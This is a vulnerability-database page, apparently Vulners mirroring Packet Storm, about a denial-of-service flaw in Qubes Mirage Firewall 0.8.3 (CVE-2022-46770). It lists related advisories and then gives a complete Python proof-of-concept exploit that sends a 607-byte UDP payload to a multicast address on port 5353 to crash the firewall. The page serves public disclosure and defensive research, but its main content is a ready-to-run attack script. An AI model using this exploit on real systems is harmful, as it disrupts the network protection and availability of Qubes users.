Qubes Mirage Firewall 0.8.3 Denial Of Service

🗓️ 31 Mar 2023 00:00:00Reported by Krzysztof BurghardtType

packetstorm🔗 packetstormsecurity.com👁 240 Views

Qubes Mirage Firewall 0.8.3 Denial Of Service (DoS) CVE-2022-4677

Reporter	Title	Published	Views	Family All 15
0day.today	qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit	31 Mar 202300:00	–	zdt
Circl	CVE-2022-46770	7 Dec 202222:11	–	circl
CNNVD	MirageOS qubes-mirage-firewall 资源管理错误漏洞	7 Dec 202200:00	–	cnnvd
CVE	CVE-2022-46770	7 Dec 202200:00	–	cve
Cvelist	CVE-2022-46770	7 Dec 202200:00	–	cvelist
Exploit DB	qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)	31 Mar 202300:00	–	exploitdb
Metasploit	Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit	18 Jan 202319:50	–	metasploit
NVD	CVE-2022-46770	7 Dec 202220:15	–	nvd
OSV	OSEC-2022-01 Infinite loop in console output on xen	7 Dec 202200:00	–	osv
Packet Storm	Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service	31 Aug 202400:00	–	packetstorm

`# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)  
# Date: 2022-12-04  
# Exploit Author: Krzysztof Burghardt <[email protected]>  
# Vendor Homepage: https://mirage.io/blog/MSA03  
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases  
# Version: >= 0.8.0 & < 0.8.4  
# Tested on: Qubes OS  
# CVE: CVE-2022-46770  
  
#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166  
  
#!/usr/bin/env python3  
  
from socket import socket, AF_INET, SOCK_DGRAM  
  
TARGET = "239.255.255.250"  
  
PORT = 5353  
  
PAYLOAD = b'a' * 607  
  
s = socket(AF_INET, SOCK_DGRAM)  
  
s.sendto(PAYLOAD, (TARGET, PORT))  
  
  
`

31 Mar 2023 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 3.17.5

EPSS0.16905

SSVC